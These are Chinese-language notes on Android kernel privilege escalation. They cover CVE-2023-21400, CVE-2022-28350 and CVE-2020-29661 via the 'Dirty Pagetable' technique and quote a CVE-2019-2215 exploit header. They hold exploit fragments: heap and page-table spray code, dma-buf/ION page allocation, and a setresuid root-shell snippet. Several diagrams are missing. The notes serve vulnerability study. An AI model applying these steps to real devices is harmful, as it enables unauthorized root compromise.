基础知识

启动命令

emulator \
	-avd Pixel_API_24 \
	-show-kernel \
	-verbose \
	-wipe-data \
	-netfast \
	-kernel arch/x86_64/boot/bzImage \
	-qemu \
	-s

CVE 复现

CVE-2023-21400 - Double Free | DirtyPTE

CVE-2023-21400 是 io_uring 中的 Double-Free 漏洞，影响内核 5.10。

漏洞分析

在io_uring中，当我们提交IOSQE_IO_DRAIN请求时，在之前提交的请求完成前，不会启动该请求。因此，推迟处理该请求，将该请求添加到io_ring_ctx->defer_list双链表中（io_defer_entry 对象）。

竞争访问1-漏洞对象取出：之前提交的请求完成以后，就会将推迟的请求（io_defer_entry对象）从defer_list中删除。由于可以并发访问defer_list，所以访问defer_list时必须加上自旋锁。但是，有一种情况是在没有completion_lock spinlock保护的情况下访问的defer_list。在io_uring中启用了IORING_SETUP_IOPOLL时，可以通过调用 io_uring_enter(IORING_ENTER_GETEVENTS)来获取事件完成情况，所触发的调用链为 io_uring_enter()->io_iopoll_check()->io_iopoll_getevents()->io_do_iopoll()->io_iopoll_complete()->io_commit_cqring()->__io_queue_deferred()。

// __io_queue_deferred() —— 从`ctx->defer_list`取出延迟的请求
static void __io_queue_deferred(struct io_ring_ctx *ctx)
{
    do {
        struct io_defer_entry *de = list_first_entry(&ctx->defer_list, // 从`ctx->defer_list`获取`io_defer_entry`对象
                        struct io_defer_entry, list);
        if (req_need_defer(de->req, de->seq))
            break;
        list_del_init(&de->list);
        io_req_task_queue(de->req); 	// 对应的请求将排队等候 task_work_run()
        kfree(de);
    } while (!list_empty(&ctx->defer_list));
}

竞争访问2：以上函数访问ctx->defer_list时没有获取ctx->completion_lock锁，可能导致竞争条件漏洞。因为除了__io_queue_deferred()函数，io_cancel_defer_files()函数也可以处理ctx->defer_list：

io_cancel_defer_files()函数有两条触发路径：

do_exit()->io_uring_files_cancel()->__io_uring_files_cancel()->io_uring_cancel_task_requests()->io_cancel_defer_files()
execve()->do_execve()->do_execveat_common()->bprm_execve()->io_uring_task_cancel()->__io_uring_task_cancel()->__io_uring_files_cancel()->io_uring_cancel_task_requests()->io_cancel_defer_files() —— 这种方式不需要退出当前任务，因此更加可控。可选择这种方式来触发。

static void io_cancel_defer_files(struct io_ring_ctx *ctx,
                  struct task_struct *task,
                  struct files_struct *files)
{
    struct io_defer_entry *de = NULL;
    LIST_HEAD(list);
    spin_lock_irq(&ctx->completion_lock);
    list_for_each_entry_reverse(de, &ctx->defer_list, list) {
        if (io_match_task(de->req, task, files)) {
            list_cut_position(&list, &ctx->defer_list, &de->list);
            break;
        }
    }
    spin_unlock_irq(&ctx->completion_lock);
    while (!list_empty(&list)) {
        de = list_first_entry(&list, struct io_defer_entry, list);
        list_del_init(&de->list);
        req_set_fail_links(de->req);
        io_put_req(de->req);
        io_req_complete(de->req, -ECANCELED);
        kfree(de);
    }
}

构造竞争：通过以下代码来构造竞争，同时处理ctx->defer_list。

改进条件竞争：竞争条件一般会触发内存损坏。对于本例会复杂一点，通常，io_cancel_defer_files()只处理当前任务创建的io_ring_ctx的延迟列表defer_list。因此，exec 任务中的io_cancel_defer_files()不会处理 iopoll 任务中相同的延迟列表。有一个例外，如果我们在exec任务中向 iopoll 任务的io_ring_ctx 提交IOSQE_IO_DRAIN请求时，就可以让exec任务进程中的io_cancel_defer_files()处理该io_ring_ctx的延迟队列。新的条件竞争如下：

在这种情况下，当exec任务和iopoll任务同时处理defer_list时，会触发内存损坏。

触发漏洞

由于竞争无法控制io_cancel_defer_files() 和 __io_queue_deferred() 何时被触发，可通过重复执行exec任务和iopoll任务，如下所示：

两种崩溃情况：

（1）由无效list造成。io_cancel_defer_files() 和 __io_queue_deferred() 会竞争遍历ctx->defer_list并从中移除对象，因此ctx->defer_list可能会无效，会触发__list_del_entry_valid()导致内核崩溃。这种情况无法利用。
（2）由Double-Free造成。情况如下：

尝试

Android内核5.10中，io_defer_entry漏洞对象位于kmalloc-128，触发Double-Free的步骤如下：

（1）在第1次 kfree() 之前：

（2）在第1次 kfree() 之后：

（3）第2次 kfree() 之后：

（4）如上所示，slab进入了非法状态：freelist和next object都指向同一空闲对象。理想情况下，我们可以从slab中分配对象两次，从而控制slab的freelist。首先，从slab中分配出一个内容可控的对象：

（5）可见，由于分配的对象内容可控，可以让next object指向我们可控的任何虚拟地址。接着，再次从slab中分配一个对象，slab如下所示：

让freelist指向我们可控的虚拟地址，就能轻松提权。问题是Android内核开启了CONFIG_SLAB_FREELIST_HARDENED，会混淆next object指针，由于freelist不可控而导致内核崩溃。

可利用性

目标：将Double-Free转化为UAF。

（1）挑战 1 - 竞争窗口过小：难以在两次释放io_defer_entry之间堆喷占用空闲对象

（2）挑战 2 - 重复触发Double-Free会降低可利用性

重复速度越快，Double-Free错误触发的速度越快。在测试时，可通过添加调试代码来增大两次kfree()之间的时间窗口，

（3）解决挑战1：

问题是，增大了竞争窗口，能够解决挑战1，但是使得重复速度变慢，很难触发Double-Free漏洞了。增大竞争窗口和提高重复速率相矛盾了。

（4）解决挑战 2 - 通过增大ctx->defer_list双链表的长度，增大iopoll任务的遍历时间，以控制竞争点的时序

首先，作者发现ctx->defer_list可以是很长的list，因为io_uring不限制ctx->defer_list中io_defer_entry对象的个数。其次，生成io_defer_entry对象很容易。根据 io_uring 稳定，我们不仅可以生成io_defer_entry对象与启用REQ_F_IO_DRAIN的请求相关联，还可以生成io_defer_entry对象与未启用REQ_F_IO_DRAIN的请求相关联。

IOSQE_IO_DRAIN
    When this flag is  specified,  the  SQE  will  not  be  started  before  previously
    submitted  SQEs  have  completed,  and new SQEs will not be started before this one
    completes. Available since 5.2.
    当指定此标志时，SQE将不会在之前提交的SQE完成之前开始处理，新的SQE也不会在这个SQE完成之前开始。5.2开始可用

以下代码用于生成100w个io_defer_entry对象，每个对象都与一个未启用 REQ_F_IO_DRAIN 的请求相关联：

iopoll  Task
(cpu A)

A1. create a `io_ring_ctx` with IORING_SETUP_IOPOLL enabled by io_uring_setup();

A2: 提交 IORING_OP_READ 请求来读取 ext4 文件系统的文件;

A3. 在启用 REQ_F_IO_DRAIN 的情况下提交请求;  // 触发生成`io_defer_entry`对象，因为还没有获取到之前的请求的CQE 

A4. for (i = 0; i < 1000000; i++) {
        在禁用 REQ_F_IO_DRAIN 的情况下提交请求;  // 触发生成`io_defer_entry`对象，和未启用REQ_F_IO_DRAIN的请求相关联
    }

由于我们能够生成非常多的io_defer_entry，且与未启用REQ_F_IO_DRAIN的请求相关联，因此可以使 __io_queue_deferred() 遍历ctx->defer_list很长一段时间。这样能使__io_queue_deferred()执行数秒钟，然后同时准确的触发执行io_cancel_defer_files()，准确触发Double-Free。

（5）解决挑战 1 - 利用两次kfree()之间的代码来增大竞争窗口

现在不需要使用重复策略来触发Double-Free了，可以任意扩大 kfree()时间窗。很可惜Jann Horn[1]、Yoochan Lee、Byoungyoung Lee、Chanwoo Min[2]提出的方法都没用。那么 io_cancel_defer_files() 中是否有些代码可以帮助增大时间窗口呢？

作者发现，io_cancel_defer_files()第2次调用kfree()之前有很多唤醒操作，例如，会调用 io_req_complete() -> io_cqring_ev_posted()。

static void io_cqring_ev_posted(struct io_ring_ctx *ctx)
{
    if (wq_has_sleeper(&ctx->cq_wait)) {
        wake_up_interruptible(&ctx->cq_wait);  //<------------------------ wakeup the waiter (1)
        kill_fasync(&ctx->cq_fasync, SIGIO, POLL_IN);
    }
    if (waitqueue_active(&ctx->wait))
        wake_up(&ctx->wait);                   //<------------------------ wakeup the waiter (2)
    if (ctx->sq_data && waitqueue_active(&ctx->sq_data->wait))
        wake_up(&ctx->sq_data->wait);          //<------------------------ wakeup the waiter (3)
    if (io_should_trigger_evfd(ctx))
        eventfd_signal(ctx->cq_ev_fd, 1);      //<------------------------ wakeup the waiter (4)
}

exec任务有4个地方会唤醒其他任务来运行，可利用第1个来扩大时间窗口。**对 io_uring fd调用epoll_wait()，就能在ctx->cq_wait上设置一个waiter；还需要另一个epoll任务来执行epoll_wait()，这样epoll任务就能在调用wake_up_interruptible()时抢占CPU，从而在第2次调用kfree()之前暂停 io_cancel_defer_files()**。问题是，如果很快就重新执行exec任务，时间窗还是很小。解决办法是采用 Jann Horn[1] 提到的调度器策略，成功将 kfree() 窗口增大数秒。

触发Double-Free并转化为UAF的流程如下：

提权

创建`signalfd_ctx`受害者对象

signalfd_ctx分配：调用signalfd()就会从 kmalloc-128 分配signalfd_ctx对象。

static int do_signalfd4(int ufd, sigset_t *mask, int flags)
{
    struct signalfd_ctx *ctx;
    ......
    sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP));// mask 值的 bit 18 和 bit 8 会被置为 1
    signotset(mask);

    if (ufd == -1) {
        ctx = kmalloc(sizeof(*ctx), GFP_KERNEL);      //<-----------  分配`signalfd_ctx`对象
        if (!ctx)
            return -ENOMEM;

        ctx->sigmask = *mask;

        /*
         * When we call this, the initialization must be complete, since
         * anon_inode_getfd() will install the fd.
         */
        ufd = anon_inode_getfd("[signalfd]", &signalfd_fops, ctx,
                       O_RDWR | (flags & (O_CLOEXEC | O_NONBLOCK)));
        if (ufd < 0)
            kfree(ctx);
    } else {
        struct fd f = fdget(ufd);
        if (!f.file)
            return -EBADF;
        ctx = f.file->private_data;
        if (f.file->f_op != &signalfd_fops) {
            fdput(f);
            return -EINVAL;
        }
        spin_lock_irq(&current->sighand->siglock);
        ctx->sigmask = *mask;                       // <----  对 signalfd_ctx->sigmask 进行有限制的写操作
        spin_unlock_irq(&current->sighand->siglock);

        wake_up(&current->sighand->signalfd_wqh);
        fdput(f);
    }

    return ufd;
}

signalfd_ctx读写操作：如上所示，在堆喷后会往signalfd_ctx开头写入8字节，但不影响利用。除了有限制的写操作，还可以通过show_fdinfo接口（procfs导出）读取signalfd_ctx的前8字节。

static void signalfd_show_fdinfo(struct seq_file *m, struct file *f)
{
    struct signalfd_ctx *ctx = f->private_data;
    sigset_t sigmask;

    sigmask = ctx->sigmask;
    signotset(&sigmask);
    render_sigset_t(m, "sigmask:\t", &sigmask); 	// 读取`signalfd_ctx`的前8字节
}

**堆喷signalfd_ctx**：在两次kfree()之间，堆喷16000 signalfd_ctx 对象来占用释放的io_defer_entry对象。如果成功占据，那么第2次kfree()就会释放这个signalfd_ctx 对象，我们将其称为受害者signalfd_ctx 对象。

定位受害者`signalfd_ctx` 对象

思路：堆喷seq_operations对象是为了确定哪一个signalfd_ctx 对象被释放了，也即受害者signalfd_ctx 对象对应的fd，便于后面利用该fd篡改PTE。

第2次kfree()后堆喷16000个seq_operations对象，可调用single_open()来分配（打开/proc/self/status或其他procfs文件可触发single_open()）。

int single_open(struct file *file, int (*show)(struct seq_file *, void *),
        void *data)
{
    struct seq_operations *op = kmalloc(sizeof(*op), GFP_KERNEL_ACCOUNT);//allocate seq_operations object
    int res = -ENOMEM;

    if (op) {
        op->start = single_start;
        op->next = single_next;
        op->stop = single_stop;
        op->show = show;
        res = seq_open(file, op);
        if (!res)
            ((struct seq_file *)file->private_data)->private = data;
        else
            kfree(op);
    }
    return res;
}

如果堆喷的seq_operations对象占据了某个释放的signalfd_ctx对象，如下所示：

方法：通过读取所有信号fd的fdinfo，如果其fdinfo与初始化不同，说明其前8字节被覆盖成了seq_operations的内核地址。该fd和受害者signalfd_ctx对象相关联。这样就定位到了受害者signalfd_ctx 对象

回收受害者`signalfd_ctx` 对象所在的slab

方法：关闭所有信号fd和/proc/self/status fd，除了受害者signalfd_ctx 对象对应的fd，这样受害者signalfd_ctx对象所在的slab变空，会被页分配器所回收。

用户页表占据受害者slab

目标：堆喷用户页表来占据受害者slab，并定位受害者signalfd_ctx对象的位置。

由于kmalloc-128 slab使用的是1-page，且用户页表也是1-page，这样可以堆喷用户页表来占据受害者slab。如果成功则如下图所示：

可见，通过写入受害者signalfd_ctx对象的前8字节，可以控制用户页表的某个PTE。将PTE的物理地址设置为内核text/data的物理地址，就能修改内核text/data数据。

页表喷射步骤如下：

（1）调用mmap()在虚拟地址空间中创建一块大内存区域

内存区域大小：因为每个末级页表描述了2M的虚拟内存（512*4096），所以如果要喷射512个用户页表，必须调用 mmap() 创建512*2M大小的内存区域。

内存区域计算 —— 内存区域大小 = 页表数量 * 2MiB

起始虚拟地址：起始虚拟地址需与2M（0x200000）对齐。原因是，现在我们只能控制signalfd_ctx的前8字节，并且不知道受害者signalfd_ctx对象在slab中具体位置，可能位于中间。0x200000对齐的起始虚拟地址能确保该地址对应的PTE位于页表的前8个字节。这样在第3步之后页表将如下所示：

（2）页表分配

分配方法：上一步已经创建了内存区域，现在可以从起始虚拟地址开始每隔0x200000字节执行一次写操作，确保内存区域对应的所有用户页表都被分配。即可堆喷用户页表。

unsigned char *addr = (unsigned char *)start_virtual_address;
for (unsigned int i = 0; i < size_of_memory_region; i+= 0x200000) {
    *(addr + i) = 0xaa;
}

（3）在页表中定位受害者signalfd_ctx对象

在第2步以后，我们只能确保每个页表的第1个PTE有效。因为受害者signalfd_ctx对象可以位于页表中与 128 对齐的任何偏移处，所以必须验证位于页表中所有与128对齐的偏移处的PTE。因此，我们从起始虚拟地址开始，每隔16K字节（每个page含有32个signalfd_ctx对象，对象大小为128字节，128 / 8 * 4096 = 16 page，这里的16K小了，但也能达到目的）进行一次写操作。最终的页表如上图所示。

定位方法：通过读取受害者信号fd的fdinfo，可以泄露受害者signalfd_ctx对象的前8个字节。如果能成功读取一个有效的PTE值，说明成功的用用户页表占用了受害者slab。否则，unmap() 该区域，重映射更大的内存，重复步骤（1）~（3）。

patch内核并提权

现在可通过受害者signalfd_ctx对象控制PTE，下面通过将PTE的物理地址设置为内核text/data地址，patch内核并提权。

（1）定位PTE对应的用户虚拟地址

目的：虽然现在可以控制用户页表的一个PTE，但是还不知道该PTE对应的用户虚拟地址。只有知道了该PTE对应的虚拟地址，才能通过写入该用户虚拟地址来patch内核的text/data。

方法：为了定位该PTE对应的用户虚拟地址，需将该PTE的物理地址修改为其他物理地址。然后遍历之前映射的所有虚拟地址，检查是否有一个虚拟地址上的值不是之前设置的初始值（0xaa）。如果找到这样一个虚拟地址，则说明就是PTE对应的虚拟地址。

写限制：受害者signalfd_ctx对象的写入能力有限（写入值的bit 18和bit 8被设置为1），无法对内核任意地址进行patch。一个普通PTE对应的用户虚拟地址为0xe800098952ff43，其bit 8总是为1，但是bit 18位于PTE的物理地址中，所以只能对bit 18为1的物理地址进行patch。

该限制是由do_signalfd4()中的sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP));语句所导致，是否可以对该语句打patch呢？

static int do_signalfd4(int ufd, sigset_t *mask, int flags)
{
    struct signalfd_ctx *ctx;
    ......
    sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP)); // 将mask中的bit 18和bit 8设置为1
    signotset(mask);

    if (ufd == -1) {
        ......
    } else {
        struct fd f = fdget(ufd);
        if (!f.file)
            return -EBADF;
        ctx = f.file->private_data;
        if (f.file->f_op != &signalfd_fops) {
            fdput(f);
            return -EINVAL;
        }
        spin_lock_irq(&current->sighand->siglock);
        ctx->sigmask = *mask;                       // <----- 对signalfd_ctx进行有限制的写操作 
        spin_unlock_irq(&current->sighand->siglock);

        wake_up(&current->sighand->signalfd_wqh);
        fdput(f);
    }

    return ufd;
}

do_signalfd4()的物理地址的 bit 18 恰好为1，因此可patch sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP)); 语句。如何找到内核某函数的物理地址？

（3）对内核打补丁

目标是对selinux_state和setresuid()/setresgid()等函数打补丁，以提权 Google Pixel 7。由于只有一个PTE可控，所以需要多次修改PTE的物理地址。

（4）调用setresuid()、setresgid()提权

if (setresuid(0, 0, 0) < 0) {
    perror("setresuid");
} else {
    if (setresgid(0, 0, 0) < 0) {
        perror("setresgid");
    } else {
        printf("[+] Spawn a root shell\n");
        system("/system/bin/sh");
    }
}

最终在Google Pixel 7上成功提权：

CVE-2022-28350 - file UAF | DirtyPTE

file UAF现有利用方法

file UAF漏洞最近比较流行，主要有3种利用方法：

（1）获取已释放的受害者file对象，供新打开的特权文件重用，例如/etc/crontab，之后就能写入特权文件提权。Jann Horn[1]、Mathias Krause[5]、Zhenpeng Lin[6]和作者[7]用到了本方法。缺点有3个，一是在新内核上必须赢得竞争，有一定技巧性和概率性；二是Android上无法写入高权限文件，因为这些文件位于只读文件系统中；三是无法逃逸容器。
（2）攻击系统库或可执行文件的页缓存， Xingyu Jin、Christian Resell、Clement Lecigne、Richard Neal[8] 和 Mathias Krause[9]用到了本方法。利用该方法可向libc.so等系统库中注入恶意代码，当特权进程执行libc.so时将以特权用户的身份执行恶意代码，利用结果类似于DirtyPipe。优点是不需要竞争，稳定性较好，但是要想在Android上完整提权或逃逸容器还很复杂，且不适用于其他类型的UAF漏洞。
（3）Cross-cache 利用。Yong Wang[10] 和 Maddie Stone[11] 都用到了本方法。提权之前都需要绕过KASLR，Yong Wang[10] 通过重复使用 syscall 代码来猜测 kslides 绕过了KASLR，Maddie Stone[11] 通过另一个信息泄露漏洞绕过了KASLR。绕过KASLR之后，他们伪造了一个file对象来构造内核读写原语。缺点是需要绕过KASLR。

脏页表方法利用file UAF

以CVE-2022-28350和内核版本为5.10的Android为例，介绍Dirty Pagetable的工作原理。

介绍：位于ARM Mali GPU驱动中的 file UAF 漏洞，影响Android 12 和 Android 13。漏洞原因如下。

static int kbase_kcpu_fence_signal_prepare(...) {
    ...
    /* create a sync_file fd representing the fence */
    sync_file = sync_file_create(fence_out); //<------ 创建 file 对象
    if (!sync_file) {
        ...
        ret = -ENOMEM;
        goto file_create_fail;
    }

    fd = get_unused_fd_flags(O_CLOEXEC); //<------ 获取未使用的 fd
    if (fd < 0) {
        ret = fd;
        goto fd_flags_fail;
    }

    fd_install(fd, sync_file->file); //<------ 将 file 对象和 fd 关联起来

    fence.basep.fd = fd;
    ...
    if (copy_to_user(u64_to_user_ptr(fence_info->fence), &fence,
            sizeof(fence))) {
        ret = -EFAULT;
        goto fd_flags_fail; //<------ 进入本分支
    }

    return 0;

fd_flags_fail:
    fput(sync_file->file); //<------ 释放 file 对象
file_create_fail:
    dma_fence_put(fence_out);

    return ret;
}

可见，调用 fd_install() 将 file 对象与 fd 关联起来。通过copy_to_user()将fd传递到用户空间，但如果拷贝失败，将释放 file 对象，导致一个有效的fd和已释放的file对象关联起来：

回收受害者slab

释放受害者slab上所有对象后，页分配器会回收该slab。

用户页表占据受害者slab

Android上 filp slab的大小是2-page，而用户页表大小是1-page。虽然二者大小不同，但是堆喷用户页表来占用受害者slab的成功率几乎是100%，占用成功后内存布局如下：

递增原语+定位受害者PTE对应的虚拟用户地址

递增原语：目的是构造写原语来篡改PTE。受害者file对象被用户页表所覆写，对该file对象进行操作可能导致内核崩溃。但是作者发现，调用 dup() 将file对象的f_count递增1，不会触发崩溃，问题是 dup() 会消耗fd资源，单个进程最多打开32768个fd，所以f_count最多递增32768。作者又发现fork()+dup()可突破该限制，先调用fork()，会将受害者file对象的f_count加1，子进程中可将f_count增加32768。由于可以多次重复fork()+dup()，所以成功突破限制。

PTE与f_count重叠：下一步是让受害者PTE的位置与f_count重合，这样就能利用递增原语来控制PTE。

file对象的对齐大小为320字节，f_count的偏移是56，占8字节。

(gdb) ptype /o struct file
/* offset      |    size */  type = struct file {
/*      0      |      16 */    union {
/*                     8 */        struct llist_node {
/*      0      |       8 */            struct llist_node *next;

                                       /* total size (bytes):    8 */
                                   } fu_llist;
/*                    16 */        struct callback_head {
/*      0      |       8 */            struct callback_head *next;
/*      8      |       8 */            void (*func)(struct callback_head *);

                                       /* total size (bytes):   16 */
                                   } fu_rcuhead;

                                   /* total size (bytes):   16 */
                               } f_u;
/*     16      |      16 */    struct path {
/*     16      |       8 */        struct vfsmount *mnt;
/*     24      |       8 */        struct dentry *dentry;

                                   /* total size (bytes):   16 */
                               } f_path;
/*     32      |       8 */    struct inode *f_inode;
/*     40      |       8 */    const struct file_operations *f_op;
/*     48      |       4 */    spinlock_t f_lock;
/*     52      |       4 */    enum rw_hint f_write_hint;
/*     56      |       8 */    atomic_long_t f_count;
/*     64      |       4 */    unsigned int f_flags;
......
......
/*    288      |       8 */    u64 android_oem_data1;

                               /* total size (bytes):  296 */
                             }

filp cache的slab大小为2-page，一个filp cache的slab中有25个file对象，slab的结构如下所示：

由于受害者file对象有25个可能的位置，为确保受害者file对象的f_count和受害者PTE恰好重合，需准备如下用户页表：

识别PTE对应的用户虚拟地址：现在我们能使受害者file对象的f_count与一个有效的PTE重合了，这个有效的PTE就是受害者PTE。如何找到受害者PTE对应的用户虚拟地址呢？可利用递增原语。

在利用递增原语之前，页表和相应的用户虚拟地址应该如下所示：可以看到，为了区分每个用户虚拟地址对应的物理页，作者将虚拟地址写在每个物理页的前8字节，作为标记。由于用户虚拟地址对应的所有物理页都是一次性分配的，因此它们的物理地址很可能是连续的。

如果我们利用递增原语将受害者PTE增加0x1000，就会改变与受害者PTE对应的物理页，如下所示：受害者PTE和另一个有效的PTE对应同一个物理页！现在可遍历所有虚拟页，检查前8字节是不是其虚拟地址，若不是，则该虚拟页就是受害者PTE对应的虚拟页。

堆喷占用页表

问题：现在找到了受害者PTE，且有递增原语。可将受害者PTE对应的物理地址设置为内核text/data的物理地址，但是mmap() 分配的内存对应的物理地址大于内核text/data的物理地址，而且递增原语有限，无法溢出受害者PTE。解决办法是使PTE指向某个用户页表，通过间接篡改用户页表，来篡改物理内存。

策略 1：现在已经让受害者PTE和另一有效PTE指向同一物理页，那么如果我们调用munmap()解除另一有效PTE的虚拟页映射，并触发物理页的释放，会发生什么？page UAF！再用用户页表占据释放页，就能控制用户页表。但问题是，很难堆喷用户页表来占据释放页。原因是，匿名 mmap() 分配的物理页来自内存区的MIGRATE_MOVABLE free_area，而用户页表是从内存区的MIGRATE_UNMOVABLE free_area分配，所以很难通过递增PTE使之指向另一用户页表。参考[10]解释了这一点。

策略 2：新策略能够捕获用户页表，步骤如下。本质是采用另一种方式来分配物理页，使该物理页和用户页表来自同一内存区域，这样如果受害者PTE指向该物理页，就能通过递增该PTE，使该PTE指向某个用户页表。

（1）对共享页和用户页表进行 heap shaping

目的：由于共享页和用户页表位于同一种内存，可将共享页嵌入到众多用户页表当中。

共享物理页：通常，内核空间和用户空间需要共享一些物理页，从两个空间都能访问到。有些组件可用于分配这些共享页，例如 dma-buf heaps, io_uring, GPUs 等。

分配共享物理页：作者选用 dma-buf 系统堆来分配共享页，因为可以从Android中不受信任的APP来访问/dev/dma_heap/system，并且 dma-buf 的实现相对简单。通过 open(/dev/dma_heap/system) 可获得一个 dma heap fd，然后用以下代码分配一个共享页：

struct dma_heap_allocation_data data;

data.len = 0x1000;
data.fd_flags = O_RDWR;
data.heap_flags = 0;
data.fd = 0;

if (ioctl(dma_heap_fd, DMA_HEAP_IOCTL_ALLOC, &data) < 0) {
    perror("DMA_HEAP_IOCTL_ALLOC");
    return -1;
}
int dma_buf_fd = data.fd;

由用户空间中的 dma_buf fd来表示一个共享页，可通过mmap() dma_buf fd 将共享页映射到用户空间。从 dma-buf 系统堆分配的共享页本质上是从页分配器分配的（实际上 dma-buf 子系统采用了页面池进行优化，对于本利用没有影响）。用于分配共享页的 gfp_flags 如下所示：

#define HIGH_ORDER_GFP  (((GFP_HIGHUSER | __GFP_ZERO | __GFP_NOWARN \ 	// HIGH_ORDER_GFP 用于 order-8和order-4 page
                | __GFP_NORETRY) & ~__GFP_RECLAIM) \
                | __GFP_COMP)
#define LOW_ORDER_GFP (GFP_HIGHUSER | __GFP_ZERO | __GFP_COMP) 			// LOW_ORDER_GFP 用于 order-0 page
static gfp_t order_flags[] = {HIGH_ORDER_GFP, HIGH_ORDER_GFP, LOW_ORDER_GFP};

共享页分配vs页表分配：从LOW_ORDER_GFP可以看出，单个共享页是从内存的MIGRATE_UNMOVABLE free_area中分配的，和页表分配的出处一样。且单个共享页为order-1 （order-0 ?），和页表的order相同。结论是，单个共享页和页表都是从同一migrate free_cache中分配，且order相同。

通过以下步骤，就能获得下图中单个共享页和用户页表的布局：

1
2
3

step1：分配3200个用户页表
step2：使用dma-buf系统堆分配单个共享页面
step3：分配3200个用户页表

（2）取消与受害者 PTE 对应的虚拟地址的映射，并将共享页映射到该虚拟地址

目标：由于共享页和页表位于同种内存，所以需要将受害者PTE从原先的物理页映射到共享物理页。

方法：可通过mmap() dma_buf fd 将共享页映射到用户空间，因此可先munmap() 受害者PTE对应的虚拟地址，然后将单个共享页映射到该虚拟地址。如下图所示：

（3）利用递增原语捕获用户页表

现在，我们利用递增原语对受害者PTE增加0x1000、0x2000、0x3000，有很大机率使受害者PTE对应到另一用户页表。如下图所示：

现在已经控制了一个用户页表。通过修改用户页表中的PTE，就能修改内核 text/data，即可提权：

CVE-2020-29661 - pid UAF | DirtyPTE

介绍：CVE-2020-29661属于pid UAF漏洞，已被Jann Horn[12]和Yong Wang[10]利用。Jann Horn在Debian上通过控制用户页表来修改只读文件（例如，setuid二进制文件）的页缓存，缺点是无法逃逸容器，且不能绕过Android上的SELinux防护。

作者采用Dirty Pagetable的方法重新利用了CVE-2020-29661，能在含有内核4.14的Google Pixel 4上提权。pid UAF 和 file UAF 都使用类似的增递增原语来操作 PTE。以下只介绍关键步骤。

脏页表方法利用CVE-2020-29661

与file UAF类似，在触发CVE-2020-29661并释放受害者slab中的所有其他pid对象后，用用户页表占用受害者slab。如下图所示，受害者pid对象位于用户页表中：

利用pid UAF构造递增原语

目标：利用递增原语篡改受害者PTE。

选取受害者pid对象的count成员与有效PTE重合，count位于pid对象的前4字节（8字节对齐）：

struct pid
{
    refcount_t count; //<------------- 4 bytes, aligned with 8
    unsigned int level;
    spinlock_t lock;
    /* lists of tasks that use this pid */
    struct hlist_head tasks[PIDTYPE_MAX];
    struct hlist_head inodes;
    /* wait queue for pidfd notifications */
    wait_queue_head_t wait_pidfd;
    struct rcu_head rcu;
    struct upid numbers[1];
};

尽管 count 字段只有4字节，但是与PTE的低4字节重合。Jann horn[12] 之前基于 count 构造了递增原语，但是限制也是由于fd资源有限，可通过 fork() 在多个进程中执行递增原语，突破限制。

分配共享页

内核4.14中没有 dma-buf，可通过ION来分配共享页，ION更加方便，因为可通过设置ION的flag直接从页分配器分配共享页。分配代码如下：

#if LEGACY_ION
int alloc_pages_from_ion(int num) {

    struct ion_allocation_data data;
    memset(&data, 0, sizeof(data));

    data.heap_id_mask = 1 << ION_SYSTEM_HEAP_ID;
    data.len = 0x1000*num;
    data.flags = ION_FLAG_POOL_FORCE_ALLOC;
    if (ioctl(ion_fd, ION_IOC_ALLOC, &data) < 0) {
        perror("ioctl");
        return -1;
    };

    struct ion_fd_data fd_data;
    fd_data.handle = data.handle;
    if (ioctl(ion_fd, ION_IOC_MAP, &fd_data) < 0) {
        perror("ioctl");
        return -1;
    }
    int dma_buf_fd = fd_data.fd;
    return dma_buf_fd;
}
#else
int alloc_pages_from_ion(int num) {

    struct ion_allocation_data data;
    memset(&data, 0, sizeof(data));

    data.heap_id_mask = 1 << ION_SYSTEM_HEAP_ID;
    data.len = 0x1000*num;
    data.flags = ION_FLAG_POOL_FORCE_ALLOC;
    if (ioctl(ion_fd, ION_IOC_ALLOC, &data) < 0) {
        perror("ioctl");
        return -1;
    }

    int dma_buf_fd = data.fd;

    return dma_buf_fd;
}
#endif

共享页由用户空间中的dma_buf_fd 表示，可通过 mmap() dma_buf_fd 将共享页映射到用户空间。

Google Pixel 4提权

成功提权：

CVE-2019-2215 - Binder UAF

exploit

/*
 * cve-2019-2215.c: Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215
 *
 * Based on proof-of-concept by Jann Horn & Maddie Stone of Google Project Zero.
 * cf. https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
 *
 * Description: Demonstration of a kernel memory R/W-only privilege escalation
 *              attack resulting in a temporary root shell.
 *
 *              Works on Google Pixel 2/Pixel 2 XL (walleye/taimen) devices
 *              running the QP1A.190711.020 image with kernel version-BuildID
 *              4.4.177-g83bee1dc48e8. For this tool to work on other devices or
 *              kernels affected by the same vulnerability, some offsets need to
 *              be found and changed.
 *
 *              Also includes a mini debug console from which it is possible to
 *              explore and modify kernel memory, as well as spawn a shell. Odd!
 *
 * Usage: Compile for AArch64 and run; all the source is in a single file on
 *        purpose. Tested with the cross-compiler toolchain in Android NDK r20.
 *
 *        Pass 'debug' as the sole cmdline argument to start the mini debug
 *        console instead of the privesc routine after kernel R/W is achieved.
 *
 * Sample output:
 *
 *  taimen:/ $ cd /data/local/tmp
 *  taimen:/data/local/tmp $ install -m 755 /sdcard/cve-2019-2215 ./
 *  taimen:/data/local/tmp $ ./cve-2019-2215
 *  Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215
 *  [+] startup
 *  [+] find kernel address of current task_struct
 *  [+] obtain arbitrary kernel memory R/W
 *  [+] find kernel base address
 *  [+] bypass SELinux and patch current credentials
 *  taimen:/data/local/tmp # id
 *  uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),
 *  1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),
 *  3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:kernel:s0
 *  taimen:/data/local/tmp # getenforce
 *  Permissive
 *  taimen:/data/local/tmp # exit
 *  taimen:/data/local/tmp $
 *
 *  <-- snip -->
 *
 *  taimen:/data/local/tmp $ ./cve-2019-2215 debug
 *  Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215
 *  [+] startup
 *  [+] find kernel address of current task_struct
 *  [+] obtain arbitrary kernel memory R/W
 *  [+] find kernel base address
 *  launching debug console, enter 'help' for quick help
 *  debug> print
 *  ffffff9bad880000 kernel_base
 *  ffffff9baf8a57d0 init_task
 *  ffffff9baf8af2c8 init_user_ns
